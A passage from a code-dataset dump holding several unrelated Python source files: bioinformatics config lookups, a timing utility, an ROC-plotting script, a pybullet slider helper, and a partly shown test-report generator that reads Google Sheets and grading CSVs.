\"transcriptome_align\"],\n \"default\": False},\n \"expression_caller\": {\"keys\": [\"config\", \"algorithm\", \"expression_caller\"],\n \"default\": []},\n \"spikein_fasta\" : {\"keys\": [\"config\", \"algorithm\", \"spikein_fasta\"], \"default\": None},\n \"transcriptome_bam\": {\"keys\": [\"transcriptome_bam\"]},\n \"fpkm_isoform\": {\"keys\": [\"fpkm_isoform\"]},\n \"fpkm\": {\"keys\": [\"fpkm\"]},\n \"galaxy_dir\": {\"keys\": [\"dirs\", \"galaxy\"]},\n \"assembled_gtf\": {\"keys\": [\"assembled_gtf\"], \"default\": []},\n \"merged_gtf\": {\"keys\": [\"merged_gtf\"], \"default\": None},\n \"transcript_assembler\": {\"keys\": [\"config\", \"algorithm\", \"transcript_assembler\"],\n \"default\": []},\n \"oncofuse_file\": {\"keys\": [\"oncofuse_file\"]},\n \"pizzly_dir\": {\"keys\": [\"pizzly_dir\"]},\n \"split_bam\": {\"keys\": [\"split_bam\"]},\n \"vrn_file\": {\"keys\": [\"vrn_file\"]},\n \"variant_regions\": {\"keys\": [\"config\", \"algorithm\", \"variant_regions\"]},\n \"variant_regions_merged\": {\"keys\": [\"config\", \"algorithm\", \"variant_regions_merged\"]},\n \"variant_regions_orig\": {\"keys\": [\"config\", \"algorithm\", \"variant_regions_orig\"]},\n \"coverage\": {\"keys\": [\"config\", \"algorithm\", \"coverage\"]},\n \"coverage_merged\": {\"keys\": [\"config\", \"algorithm\", \"coverage_merged\"]},\n \"coverage_orig\": {\"keys\": [\"config\", \"algorithm\", \"coverage_orig\"]},\n \"callable_regions\": {\"keys\": [\"regions\", \"callable\"]},\n \"avg_coverage\": {\"keys\": [\"regions\", \"avg_coverage\"]},\n \"coverage_depth_bed\": {\"keys\": [\"regions\", \"coverage_depth_bed\"]},\n \"callable_min_size\": {\"keys\": [\"config\", \"algorithm\", \"callable_min_size\"],\n \"default\": 1000000},\n \"min_allele_fraction\": {\"keys\": [\"config\", \"algorithm\", \"min_allele_fraction\"]},\n \"save_diskspace\": {\"keys\": 
[\"config\", \"algorithm\", \"save_diskspace\"]},\n \"salmon\": {\"keys\": [\"salmon\"]},\n \"umi_type\": {\"keys\": [\"config\", \"algorithm\", \"umi_type\"]},\n \"sample_barcodes\": {\"keys\": [\"config\", \"algorithm\", \"sample_barcodes\"]},\n \"cellular_barcodes\": {\"keys\": [\"config\", \"algorithm\", \"cellular_barcodes\"],\n \"default\": []},\n \"minimum_barcode_depth\": {\"keys\": [\"config\", \"algorithm\", \"minimum_barcode_depth\"],\n \"default\": 100000},\n \"cellular_barcode_correction\": {\"keys\": [\"config\", \"algorithm\",\n \"cellular_barcode_correction\"],\n \"default\": 1},\n \"kallisto_quant\": {\"keys\": [\"kallisto_quant\"]},\n \"salmon_dir\": {\"keys\": [\"salmon_dir\"]},\n \"sailfish\": {\"keys\": [\"sailfish\"]},\n \"sailfish_dir\": {\"keys\": [\"sailfish_dir\"]},\n \"sailfish_transcript_tpm\": {\"keys\": [\"sailfish_transcript_tpm\"]},\n \"sailfish_gene_tpm\": {\"keys\": [\"sailfish_gene_tpm\"]},\n \"sample_callable\": {\"keys\": [\"regions\", \"sample_callable\"]},\n \"coverage_interval\": {\"keys\": [\"config\", \"algorithm\", \"coverage_interval\"]},\n \"coverage_depth_min\": {\"keys\": [\"config\", \"algorithm\", \"coverage_depth_min\"],\n \"default\": 4},\n \"maxcov_downsample\": {\"keys\": [\"config\", \"algorithm\", \"maxcov_downsample\"],\n \"default\": False},\n \"joint_group_size\": {\"keys\": [\"config\", \"algorithm\", \"joint_group_size\"],\n \"default\": 200},\n \"report\": {\"keys\": [\"config\", \"algorithm\", \"report\"]},\n \"work_bam\": {\"keys\": [\"work_bam\"]},\n \"deduped_bam\": {\"keys\": [\"deduped_bam\"]},\n \"align_bam\": {\"keys\": [\"align_bam\"]},\n \"disc_bam\": {\"keys\": [\"work_bam_plus\", \"disc\"]},\n \"sr_bam\": {\"keys\": [\"work_bam_plus\", \"sr\"]},\n \"tools_off\": {\"keys\": [\"config\", \"algorithm\", \"tools_off\"], \"default\": [], \"always_list\": True},\n \"tools_on\": {\"keys\": [\"config\", \"algorithm\", \"tools_on\"], \"default\": [], \"always_list\": True},\n \"cwl_reporting\": {\"keys\": [\"config\", \"algorithm\", \"cwl_reporting\"]},\n}\n\ndef get_batches(data):\n batches = get_batch(data)\n if batches:\n if not isinstance(batches, (list, tuple)):\n batches = [batches]\n return batches\n\ndef get_input_sequence_files(data, default=None):\n \"\"\"\n returns the input sequencing files, these can be single or paired FASTQ\n files or BAM files\n \"\"\"\n if \"files\" not in data:\n file1, file2 = None, None\n elif len(data[\"files\"]) == 2:\n file1, file2 = data[\"files\"]\n else:\n assert len(data[\"files\"]) == 1, data[\"files\"]\n file1, file2 = data[\"files\"][0], None\n return file1, file2\n\ndef get_umi_consensus(data):\n \"\"\"Retrieve UMI for consensus based preparation.\n\n We specify this either as a separate fastq file or embedded\n in the read name as `fastq_name`.`\n \"\"\"\n consensus_choices = ([\"fastq_name\"])\n umi = tz.get_in([\"config\", \"algorithm\", \"umi_type\"], data)\n if umi and (umi in consensus_choices or os.path.exists(umi)):\n assert tz.get_in([\"config\", \"algorithm\", \"mark_duplicates\"], data, True), \\\n \"Using consensus UMI inputs requires marking duplicates\"\n return umi\n\ndef get_dexseq_gff(config, default=None):\n \"\"\"\n some older versions of the genomes have the DEXseq gff file as\n gff instead of gff3, so this handles that by looking for either one\n \"\"\"\n dexseq_gff = tz.get_in(tz.get_in(['dexseq_gff', 'keys'], LOOKUPS, {}),\n config, None)\n if not dexseq_gff:\n return None\n gtf_file = get_gtf_file(config)\n if gtf_file:\n base_dir = 
os.path.dirname(gtf_file)\n else:\n base_dir = os.path.dirname(dexseq_gff)\n base, _ = os.path.splitext(dexseq_gff)\n gff_file = os.path.join(base_dir, base + \".gff\")\n if file_exists(gff_file):\n return gff_file\n gtf_file = os.path.join(base_dir, base + \".gff3\")\n if file_exists(gtf_file):\n return gtf_file\n else:\n return None\n\ndef getter(keys, global_default=None, always_list=False):\n def lookup(config, default=None):\n default = global_default if not default else default\n val = tz.get_in(keys, config, default)\n if always_list:\n if not val:\n val = []\n elif not isinstance(val, (list, tuple)): val = [val]\n return val\n return lookup\n\ndef setter(keys, checker):\n def update(config, value):\n if checker and not checker(value):\n logger.error(\"%s fails check %s.\" % (value, checker))\n sys.exit(1)\n return tz.update_in(config, keys, lambda x: value, default=value)\n return update\n\ndef is_setter(keys):\n def present(config):\n try:\n value = tz.get_in(keys, config, no_default=True)\n except:\n value = False\n return True if value else False\n return present\n\n\"\"\"\ngenerate the getter and setter functions but don't override any explicitly\ndefined\n\"\"\"\n_g = globals()\nfor k, v in LOOKUPS.items():\n keys = v['keys']\n getter_fn = 'get_' + k\n if getter_fn not in _g:\n _g[\"get_\" + k] = getter(keys, v.get('default', None), v.get(\"always_list\", False))\n setter_fn = 'set_' + k\n if setter_fn not in _g:\n _g[\"set_\" + k] = setter(keys, v.get('checker', None))\n is_setter_fn = \"is_set\" + k\n if is_setter_fn not in _g:\n _g[\"is_set_\" + k] = is_setter(keys)\n\ndef sample_data_iterator(samples):\n \"\"\"\n for a list of samples, return the data dictionary of each sample\n \"\"\"\n for sample in samples:\n yield sample[0]\n\ndef get_in_samples(samples, fn):\n \"\"\"\n for a list of samples, return the value of a global option\n \"\"\"\n for sample in samples:\n if fn(sample[0], None):\n return fn(sample[0])\n return None\n\ndef get_keys(lookup):\n \"\"\"\n return the keys used to look up a function in the datadict\n \"\"\"\n return tz.get_in((lookup, \"keys\"), LOOKUPS, None)\n","repo_name":"YTLogos/bcbio-nextgen","sub_path":"bcbio/pipeline/datadict.py","file_name":"datadict.py","file_ext":"py","file_size_in_byte":15014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"7561043452","text":"import json\nimport os\nfrom timeit import default_timer\nfrom typing import Dict, List, Union\n\nfrom manyfold.utils import gcp\n\nEntry = Union[List[float], Dict[str, float], float]\n\n\nclass RecordTime:\n \"\"\"Record blocks of python code by placing in the `with RecordTime(...)` block.\n\n If the `file_path` is provided and starts with 'gs://' upload a json file to the\n gcloud bucket. 
If the `file_path` is provided and doesn't start with 'gs://' it will\n be written locally.\n\n Usage:\n # Add to a timings json file: Dict[str, float], or add the entry to a new file.\n with RecordTime(\"some_name\", file_path):\n ...\n # OR:\n # add the entry to a dictionary, no file written to.\n with RecordTime(\"some_name\", timings_dict=timings_dict):\n ...\n # OR:\n # If you only want one timing in the current block of code.\n with RecordTime() as rt:\n ...\n t = rt.elapsed\n # OR:\n # Add a timing dictionary to the timings json file.\n RecordTime.manually_add(file_path, \"some_name\", some_timings_data)\n \"\"\"\n\n def __init__(\n self,\n name: str = \"\",\n file_path: str = \"\",\n timings_dict: Dict[str, float] = None,\n pbar=None,\n overwrite_entry=True,\n ):\n self.file_path = file_path\n self.name = name\n self.overwrite = overwrite_entry\n self.stdout = print if pbar is None else pbar.set_description\n self.timings_dict = {} if timings_dict is None else timings_dict\n\n def __enter__(self):\n self.stdout(f\"timing: {self.name}...\")\n self.t = default_timer()\n return self\n\n @staticmethod\n def _read(file_path):\n if file_path.startswith(\"gs://\"):\n return json.loads(gcp.download(file_path)) if gcp.is_blob(file_path) else {}\n else:\n return json.loads(open(file_path)) if os.path.isfile(file_path) else {}\n\n @staticmethod\n def _write(file_path, times: Dict[str, Entry]):\n jstr = json.dumps(times, indent=4, sort_keys=True)\n if file_path.startswith(\"gs://\"):\n gcp.upload(jstr, file_path, from_string=True)\n else:\n with open(file_path, \"w\") as f:\n f.write(jstr)\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.stdout(\"done\")\n self.elapsed = default_timer() - self.t\n if self.file_path != \"\":\n times = self._read(self.file_path)\n if self.name not in times or self.overwrite:\n times[self.name] = self.elapsed\n RecordTime._write(self.file_path, times)\n else:\n self.stdout(f\"{self.name} not written because overwrite is False.\")\n elif self.timings_dict is not None:\n self.timings_dict[self.name] = self.elapsed\n\n @staticmethod\n def manually_add(file_path: str, name: str, value: Entry):\n times = RecordTime._read(file_path)\n times[name] = value\n RecordTime._write(file_path, times)\n","repo_name":"instadeepai/manyfold","sub_path":"manyfold/utils/timing.py","file_name":"timing.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"85"} +{"seq_id":"25800895207","text":"\nimport os,sys\n# import time, datetime\nsys.path.insert(0, '/home/madhu/work/codes')\nfrom main import check_endWith, check_create_dir, check_env, read_file, write_file, count_lines, save_file\n\nimport TS_finetune_pred_MP\nfrom datetime import datetime\n\nimport warnings\n# warnings.filterwarnings(\"ignore\", category=FutureWarning)\nwarnings.filterwarnings(\"ignore\")\n\nfrom sklearn.metrics import roc_auc_score, roc_curve\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n'''\nThis script draws the ROC curves.\nAt the moment, it reads the log output file and calculates the probs and true labels \n'''\n\nif __name__=='__main__' and '__file__' in globals():\n\n check_env('torch')\n\n startTime = datetime.now()\n current_time = startTime.strftime(\"%Y/%m/%d at %H:%M:%S\")\n print('\\n\\nThe script starting at: ' + str(current_time), ' \\n\\n' )\n\n # log_file_name = '/home/madhu/Logs/predict__train_p3_ALL_A_BilstmMean.layers3.hs512.F.lr1000.b256.p1000.GPU.ep1.270011.pt__A.log'\n \n log_file_name = 
sys.argv[1]\n REF_GENOME = sys.argv[2]\n save_folder = sys.argv[3]\n check_endWith(save_folder)\n\n log_file_content = read_file(log_file_name)\n ref_gene_content = read_file(REF_GENOME)\n\n # pred_folder = sys.argv[9]\n # print(log_file_content.split('Pred: ')[0:2])\n # print(ref_gene_content)\n\n gene_list = []\n for a_part in ref_gene_content.split('\\n'):\n if a_part.startswith('>'):\n gene_list.append( a_part.split('>')[1] )\n # print( a_part.split('>')[1] )\n # for a_gene_part in a_part.split('>'):\n # print('a_gene_part: ', a_gene_part)\n y_true = []\n y_score = []\n for a_part in log_file_content.split('\\n'):\n # if a_part.startswith('Pred: '+):\n # a_part.split()\n for a_gene in gene_list:\n if a_part.startswith('Pred: '+a_gene):\n info_part = a_part.split(' ')\n if len(info_part) == 6:\n conf_mat = info_part[2:len(info_part)]\n \n if (int(conf_mat[0])+int(conf_mat[1])) != 0 and (int(conf_mat[2])+int(conf_mat[3])) != 0:\n y_true.append(0)\n y_score.append(int(conf_mat[1])/(int(conf_mat[0])+int(conf_mat[1])))\n # print('y_true: ', y_true)\n # print('y_score: ', y_score)\n\n y_true.append(1)\n y_score.append(int(conf_mat[3])/(int(conf_mat[2])+int(conf_mat[3])))\n # print('y_true: ', y_true)\n # print('y_score: ', y_score)\n \n # if a_part.startswith(a_gene):\n # print( a_part.split(' ') )\n\n # for a_value in a_part.split(' '):\n # if a_value != '':\n # print('a_value: ', a_value)\n\n print('y_true: ', y_true)\n print('y_score: ', y_score)\n\n\n '''\n Draw the ROc curves .... \n '''\n\n saveFig_title = save_folder+save_folder.split('/')[len(save_folder.split('/'))-2]+'__ROC_curve.png'\n\n fpr, tpr, thresholds = roc_curve(y_true, y_score)\n AUC_score = roc_auc_score(y_true, y_score)\n\n save_ROC_results = save_folder+save_folder.split('/')[len(save_folder.split('/'))-2]+'__ROC_results.pkl'\n save_file(save_ROC_results, (fpr, tpr, thresholds, AUC_score))\n\n print('XXXXXXX The AUC score is: ', round(AUC_score, 2))\n fig, ax = plt.subplots(figsize=(20, 10))\n plt.plot(fpr, tpr, 'r', linewidth=2, label='ROC curve [Area Under Curve (AUC = {:.4f})]'.format(AUC_score))\n plt.legend(loc='lower right', fontsize=20)\n plt.plot([0, 1], [0, 1], color='navy', linestyle='--')\n plt.xlim([-0.02, 1.02])\n plt.ylim([-0.02, 1.02])\n plt.xlabel('Specificity', fontsize=20)\n plt.ylabel('Sensitivity', fontsize=20)\n # plt.xlabel('False Positive Rate', fontsize=20)\n # plt.ylabel('True Positive Rate', fontsize=20)\n \n n_split = 11\n xTick_list = []\n for n in np.linspace(0, 1, n_split):\n xTick_list.append(str(int(n*100))+'%')\n # reversing the list\n new_xTick_list = []\n for i in xTick_list:\n new_xTick_list.insert(0, i)\n plt.xticks(np.linspace(0, 1, n_split), new_xTick_list, fontsize=15)\n yTick_list = []\n for n in np.linspace(0, 1, n_split):\n yTick_list.append(str(int(n*100))+'%')\n plt.yticks(np.linspace(0, 1, n_split), yTick_list, fontsize=15)\n plt.grid(color='y', linewidth=0.5)\n \n # plt.title('Mean ROC curve for TB Index Score', fontsize=35)\n plt.show()\n \n \n plt.savefig(saveFig_title)\n print('The ROC figure has been saved at: ', saveFig_title)\n plt.close('all')\n\n \n # executionTime = (datetime.now() - startTime)\n # current_time = datetime.now().strftime(\"%Y/%m/%d at %H:%M:%S\")\n # print('\\n\\nThe script completed at: ' + str(current_time))\n # print('Execution time: ' + str(executionTime), ' 
\\n\\n')\n\n\n\n","repo_name":"Madhurananda/my_current_work_draft","sub_path":"codes/ML_codes/madhu_codes/plot_ROC.py","file_name":"plot_ROC.py","file_ext":"py","file_size_in_byte":4911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"85"} +{"seq_id":"10062931678","text":"import pybullet as p\n\n\nclass SlideBars():\n def __init__(self, Id):\n self.Id = Id\n self.motorNames = []\n self.motorIndices = []\n self.motorLowerLimits = []\n self.motorUpperLimits = []\n self.slideIds = []\n\n self.numJoints = p.getNumJoints(self.Id)\n\n def add_slidebars(self):\n for i in range(self.numJoints):\n jointInfo = p.getJointInfo(self.Id, i)\n jointName = jointInfo[1].decode('ascii')\n qIndex = jointInfo[3]\n lowerLimits = jointInfo[8]\n upperLimits = jointInfo[9]\n if qIndex > -1:\n self.motorNames.append(jointName)\n self.motorIndices.append(i)\n self.motorLowerLimits.append(lowerLimits)\n self.motorUpperLimits.append(upperLimits)\n\n for i in range(len(self.motorIndices)):\n if self.motorLowerLimits[i] <= self.motorUpperLimits[i]:\n slideId = p.addUserDebugParameter(self.motorNames[i],\n self.motorLowerLimits[i],\n self.motorUpperLimits[i], 0)\n else:\n slideId = p.addUserDebugParameter(self.motorNames[i],\n self.motorUpperLimits[i],\n self.motorLowerLimits[i], 0)\n self.slideIds.append(slideId)\n\n return self.motorIndices\n\n def get_slidebars_values(self):\n slidesValues = []\n for i in self.slideIds:\n value = p.readUserDebugParameter(i)\n slidesValues.append(value)\n return slidesValues","repo_name":"borninfreedom/kuka-reach-drl","sub_path":"utils/SlideBars.py","file_name":"SlideBars.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"85"} +{"seq_id":"15057987375","text":"'''\nThis is an import-only object version of main.py.\nFor manipulating the app via python.\n'''\n\n'''\nQT Imports\n'''\nfrom PyQt5.QtWidgets import *\n\n'''\nData Manipulation Imports\n'''\nfrom data_utils import retry\nfrom typing import Callable\nimport numpy as np\nimport json\nimport os.path\nimport shutil as sh\nimport sys\nimport os\nimport pandas as pd\nfrom datetime import (datetime, timedelta)\nfrom tqdm import tqdm\nfrom bs4 import BeautifulSoup\nfrom glob import glob\nimport time\nfrom pathlib import Path\n\n'''\nUtils Imports\n'''\nfrom aws_utils import *\nfrom data_utils import *\nfrom google_utils import *\nfrom graphics_utils import *\nfrom upload_utils import *\nimport score_converters\n\nfrom widgets.meta_window import MetaWindow\nfrom widgets.alert import Alert\n\n'''\nHTML Tools\n'''\nimport dominate\nfrom dominate.tags import *\nfrom dominate.util import raw\n\n\nclass Reportgen():\n def __init__(self,\n resource_path: str,\n debug: bool = True,\n log: bool = True,\n answers_only: bool = False,\n answers_and_topics_only: bool = False,\n ):\n self.log = log\n\n '''\n Debug toggle and debug bypass steps\n '''\n self.debug = debug # Toggles all below to False when on.\n self.skip_generation = self.debug and True\n self.skip_merge = self.debug and (self.skip_generation or True)\n self.skip_notifications = self.debug and True\n self.skip_name_mapping_step = self.debug and True\n self.no_upload_aws = self.debug and True\n self.no_upload_gcp = self.debug and True\n self.no_upload_db = self.debug and True\n self.check_for_reruns = self.debug and False\n\n self.delete_non_merged = True\n\n '''\n Default User-Toggleable States\n '''\n self.answers_only = answers_only\n 
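# These flags trim what gets generated: answers_only skips all charts, while answers_and_topics_only keeps the topic chart but skips the per-subtopic charts.\n        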
self.answers_and_topics_only = answers_and_topics_only\n\n self.nl = '\\n'\n\n '''\n Key Init Steps\n '''\n home_path = os.environ['HOME']\n # Path to core data - local breakdown copy, etc...\n self.data_path = os.path.join(home_path, 'REDACTED')\n if not os.path.exists(self.data_path):\n print('This appears to be a fresh install - initializing cache!')\n os.mkdir(self.data_path)\n self.mem_path = os.path.join(self.data_path, 'memory.json')\n self.resource_path = resource_path # 'src/main/resources/'\n self.install_resource_path = os.path.join(self.resource_path, 'install')\n\n '''\n Reinit Memory if Not Found\n '''\n if not os.path.exists(self.mem_path):\n print('Memfile not found; reinitializing from backup.')\n mem_install_path = os.path.join(self.install_resource_path, 'memory_init.json')\n sh.copy(mem_install_path, self.mem_path)\n\n '''\n Load Memory, and reinit memory files if not found.\n Then save.\n '''\n self.mem = load_json(self.mem_path)\n self.db_path = os.path.join(self.data_path, 'db')\n if not os.path.exists(self.db_path):\n os.mkdir(self.db_path)\n\n if not self.mem['paths_set']:\n print('Memory Key Paths not set; recreating them from defaults now.')\n for k in self.mem['db_info'].keys():\n mkdir_force(os.path.join(self.db_path, k))\n\n self.mem['db_info']['bkdn']['path'] = os.path.join(self.db_path, 'bkdn')\n self.mem['db_info']['protocols']['path'] = os.path.join(self.db_path, 'protocols')\n self.mem['paths_set'] = True\n\n self.save_mem()\n\n '''\n I/O path selection\n '''\n self.BREAKDOWN_PATH = self.mem['db_info']['bkdn']['path']\n self.BKDN_SHEET_ID = self.mem['db_info']['bkdn']['sheet_id']\n self.TEST_PROTOCOLS_PATH = self.mem['db_info']['protocols']['path']\n self.TEST_PROTOCOLS_SHEET_ID = self.mem['db_info']['protocols']['sheet_id']\n\n self.OUTPUT_PATH = None # Will be set by widget during init.\n\n self.LAST_UPDATE = parse_datetime(self.mem['db_info']['last_updated'])\n if (not self.LAST_UPDATE) or (self.LAST_UPDATE < (datetime.now() - timedelta(days=1))):\n print('UPDATING TEST DATABASE')\n self.db_update(as_init=True)\n self.mem['db_info']['last_updated'] = datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")\n self.save_mem()\n\n self.bkdn_dfs = pickle_load(self.BREAKDOWN_PATH)\n self.test_name_options = [k for k in self.bkdn_dfs.keys() if k[0] != '_']\n\n self.TEST_NAME = None\n self.NAME_ID_MAP = dict()\n self.SECTIONS = None\n self.sections_present = []\n\n self.bkdn = None\n self.test_order = None\n\n self.chosen_files = []\n\n self.raw_reports = dict()\n self.student = None\n\n self.test_meta_info = None\n\n def home(self):\n '''\n Include the below two lines to refresh options after db update:\n '''\n self.bkdn_dfs = pickle_load(self.BREAKDOWN_PATH)\n self.test_name_options = [k for k in self.bkdn_dfs.keys() if k[0] != '_']\n\n print_conditional(f'Output path: {self.OUTPUT_PATH}', self.log)\n\n def set_params(self, test_name: str,\n test_meta_info: dict,\n chosen_files: list):\n self.TEST_NAME = test_name\n assert test_meta_info.get('test_date') != None\n self.test_meta_info = test_meta_info\n print_conditional(self.test_meta_info, self.log)\n self.chosen_files = chosen_files\n\n assert self.params_set()\n\n def db_update(self, as_init=False):\n persisted_creds_path = os.path.join(self.resource_path, 'REDACTED')\n CREDS_PATH = persisted_creds_path\n TOKEN_PATH = os.path.join(self.resource_path, 'REDACTED')\n service = sheets_auth(TOKEN_PATH, CREDS_PATH)\n for key, value in self.mem['db_info'].items():\n if key != 'last_updated':\n 
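# Re-download this sheet from Google Sheets and refresh its local pickle cache.\n                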
print_conditional(f'Updating: {key.upper()}', self.log)\n self.sheet_update(service, value)\n if not as_init:\n # re_init home\n self.home()\n\n def sheet_update(self, service, sheet_info):\n meta = service.spreadsheets().get(spreadsheetId=sheet_info['sheet_id']).execute()\n sheets = [s['properties']['title'] for s in meta['sheets']]\n params = {'spreadsheetId': sheet_info['sheet_id'], 'ranges': sheets, 'majorDimension': 'ROWS'}\n result = service.spreadsheets().values().batchGet(**params).execute()\n all_sheets = result['valueRanges']\n sheet_dfs = {name: self.sheet_to_df(sheet) for name, sheet in tqdm(zip(sheets, all_sheets))}\n pickle_save(sheet_info['path'], sheet_dfs)\n\n def sheet_to_df(self, sheet):\n # Call the Sheets API\n values = sheet.get('values', [])\n df = pd.DataFrame.from_records(values).fillna('N/A')\n h = df.iloc[0]\n df = df.iloc[1:]\n df.columns = h\n return df\n\n def save_mem(self):\n # Save and reload.\n write_json(self.mem, self.mem_path)\n self.mem = load_json(self.mem_path)\n print_conditional(self.mem['db_info']['last_updated'], self.log)\n\n def save_selected_input_files_to_memory(self, files):\n # Save selected files location so future selection opens the same dir\n default_dir = str(Path(files[0]).parent)\n self.mem['input_select_default_dir'] = default_dir\n self.save_mem()\n self.chosen_files = files\n\n def change_output_folder(self, new_outpath):\n self.mem['output_select_default_dir'] = str(Path(new_outpath).parent)\n self.mem['io']['outpath'] = new_outpath\n self.save_mem()\n self.OUTPUT_PATH = new_outpath\n\n def reset_to_do_more(self):\n self.chosen_files = []\n self.TEST_NAME = None\n\n def params_set(self):\n must_be_non_null = [\n self.TEST_NAME,\n self.test_meta_info\n\n ]\n must_be_true = [\n len(self.chosen_files) > 0,\n ]\n\n print_conditional([must_be_non_null, must_be_true], self.log)\n return (None not in must_be_non_null) and (False not in must_be_true)\n\n def prepare_for_parse(self):\n self.bkdn = self.bkdn_dfs[self.TEST_NAME]\n # Remove extraneous whitespace from data.\n for c in self.bkdn.columns:\n self.bkdn[c] = self.bkdn[c].apply(lambda x: str(x).strip())\n # Remove all bash-reserved chars from bkdn:\n self.bkdn = self.bkdn.applymap(remove_problematic_chars)\n\n # Alter column names for ease of indexing:\n self.bkdn.columns = [strp_nonanum(c).lower() for c in self.bkdn.columns]\n self.bkdn = self.bkdn.replace('', np.nan)\n\n '''\n Compress Subtopics into One Column:\n '''\n subtopic_cols = self.bkdn[[col for col in self.bkdn.columns if 'subtopic' in col.lower()]]\n if self.debug:\n pickle_save(ensure_path(os.path.join(self.data_path, f'debug/{self.TEST_NAME}/subtopic_cols.pickle')),\n subtopic_cols)\n\n self.bkdn = self.bkdn.drop(subtopic_cols, axis=1)\n\n if self.debug:\n pickle_save(\n ensure_path(os.path.join(self.data_path, f'debug/{self.TEST_NAME}/debug_bkdn_prejoin.pickle')),\n self.bkdn)\n\n self.test_order = self.bkdn.section.unique()\n\n # Contatenate subtopics with +, while dropping NANs.\n self.bkdn['subtopic'] = subtopic_cols.apply(lambda x: ' + '.join([str(v) for v in x.dropna().values]),\n axis=1)\n self.bkdn.index = pd.Index([str(i) for i in self.bkdn.index])\n\n # Update Sections, Subsections\n self.SECTIONS = self.bkdn.section.unique()\n\n def parse_reports(self):\n '''\n :return: a DataFrame containing the score data from a given test.\n '''\n assert self.params_set(), 'You are attempting to parse reports out of sequence. 
Please run self.set_params.'\n\n self.chosen_files = sorted(self.chosen_files)\n report_paths = sorted([os.path.relpath(p) for p in self.chosen_files]).copy()\n debug_report_paths = sorted([os.path.abspath(p) for p in self.chosen_files]).copy()\n\n # This function fills missing student data with NANs between reports.\n # Returns any files that are completely empty.\n empty_files = fix_missing_students(report_paths.copy())\n empty_fnames = [Path(p).name for p in empty_files]\n print_conditional(['Ignoring: ', empty_fnames], self.log)\n\n report = pd.DataFrame()\n\n if self.debug:\n pickle_save(os.path.join(self.data_path, f'debug/{self.TEST_NAME}/bkdn_parse_step.pickle'), self.bkdn)\n pickle_save(os.path.join(self.data_path, f'debug/{self.TEST_NAME}/report_paths_parse_step.pickle'),\n debug_report_paths)\n\n # Iterate through reports (separated by section)\n\n files_to_upload = []\n for path in report_paths:\n if Path(path).name not in empty_fnames:\n files_to_upload.append(os.path.abspath(path))\n\n print_conditional(self.SECTIONS, self.log)\n # try:\n print_conditional(self.bkdn.columns, self.log)\n path_fname = path.split('/')[-1].split('.')[0]\n print_conditional(path_fname, self.log)\n filtered = self.bkdn[self.bkdn.correspondingfilename.str.upper() == path_fname.upper()]\n\n try:\n section = filtered.section.unique()[0]\n except:\n Alert(\n f\"Couldn't find Corresponding_File_Names {self.bkdn.correspondingfilename.unique()} for test {self.TEST_NAME} in input files; are you using the right reports?\",\n title='Wrong Test Name (Likely)')\n assert False\n subsection = filtered.subsection\n a_df = pd.read_csv(path)\n # Reformat columns for easy indexing:\n a_df.columns = ['_'.join(c.split()) for c in a_df.columns]\n\n self.raw_reports[section] = a_df\n\n # Copy df for safety.\n a_new = a_df.copy()\n\n key = a_new[a_new.First_Name == 'Answer Key'].iloc[:, 9:].T\n key.columns = ['key']\n\n students_data = a_new[a_new.First_Name != 'Answer Key']\n names = students_data['First_Name'] + ' ' + students_data['Last_Name']\n\n # Map each student to their student ID (gradecam)\n section_name_id_map = pd.concat([students_data.Student_ID, names], axis=1)\n section_name_id_map.columns = ['id', 'name']\n section_name_id_map = section_name_id_map.set_index('name').to_dict()['id']\n self.NAME_ID_MAP.update(section_name_id_map)\n\n responses = students_data.iloc[:, 9:]\n # Grab and format student names\n students = responses.set_index(names).T\n\n if self.debug:\n pickle_save(\n os.path.join(self.data_path, f'debug/{self.TEST_NAME}/students_isolated_from_report.pickle'),\n students)\n\n # Fillna with \"N/A\" so that empty answers are not dropped from the df.\n data = pd.concat([key, students], axis=1).fillna('N/A')\n\n data['section'] = section\n data['subsection'] = subsection\n self.sections_present.append(section)\n\n # Remove duplicated student name columns - students with duplicate entries.\n data = (data.T.loc[~data.T.index.duplicated(keep='first')]).T\n\n report = pd.concat([report, data], axis=0, sort=True)\n\n else:\n print_conditional(f'Skipping: {path}', self.log)\n\n if self.debug:\n pickle_save(os.path.join(self.data_path, f'debug/{self.TEST_NAME}/parsed_report.pickle'), report)\n pickle_save(os.path.join(self.data_path, f'debug/{self.TEST_NAME}/name_id_map.pickle'), self.NAME_ID_MAP)\n\n return report\n\n def generate(self, data):\n student_in_section = (data.groupby('section').count() > 0)\n print_conditional('Students in each section:', self.log)\n print_conditional(student_in_section, 
self.log)\n\n # Further parse breakdown now that parse_reports has detected which subsections are present in the data.\n self.bkdn = self.bkdn[self.bkdn.section.apply(lambda x: x in self.sections_present)]\n\n # Reindex to allow for subsection alignment:\n self.bkdn.index = self.bkdn.section + '-' + self.bkdn.ques\n data.index = data.section + '-' + data.index\n\n students = [c for c in data.columns.dropna() if ('key' != c.lower()) \\\n and ('section' != c.lower()) \\\n and ('subsection' != c.lower())]\n\n if self.debug:\n pickle_save(ensure_path(os.path.join(self.data_path, f'debug/{self.TEST_NAME}/debug_bkdn.pickle')),\n self.bkdn)\n pickle_save(\n ensure_path(os.path.join(self.data_path, f'debug/{self.TEST_NAME}/{self.TEST_NAME}_data.pickle')),\n data)\n pickle_save(ensure_path(os.path.join(self.data_path, f'debug/{self.TEST_NAME}/students_debug.pickle')),\n students)\n\n test_output_path = os.path.join(self.OUTPUT_PATH,\n f'{self.TEST_NAME} - {self.test_meta_info[\"test_date\"]}')\n\n if not os.path.exists(test_output_path):\n os.mkdir(test_output_path)\n\n all_report_contexts = []\n for student in tqdm(students):\n student_id = self.NAME_ID_MAP[student]\n\n already_run = False\n already_run_message = ''\n if self.check_for_reruns:\n already_run_message, already_run = is_already_run(student_id, self.TEST_NAME)\n if not already_run:\n student_output_path = os.path.join(test_output_path, student)\n if os.path.exists(student_output_path):\n sh.rmtree(student_output_path)\n os.mkdir(student_output_path)\n\n report_context = {'sections': [],\n 'outdir': student_output_path,\n 'test_outdir': test_output_path,\n 'student_outdir': student_output_path,\n 'student': student,\n 'test_name': 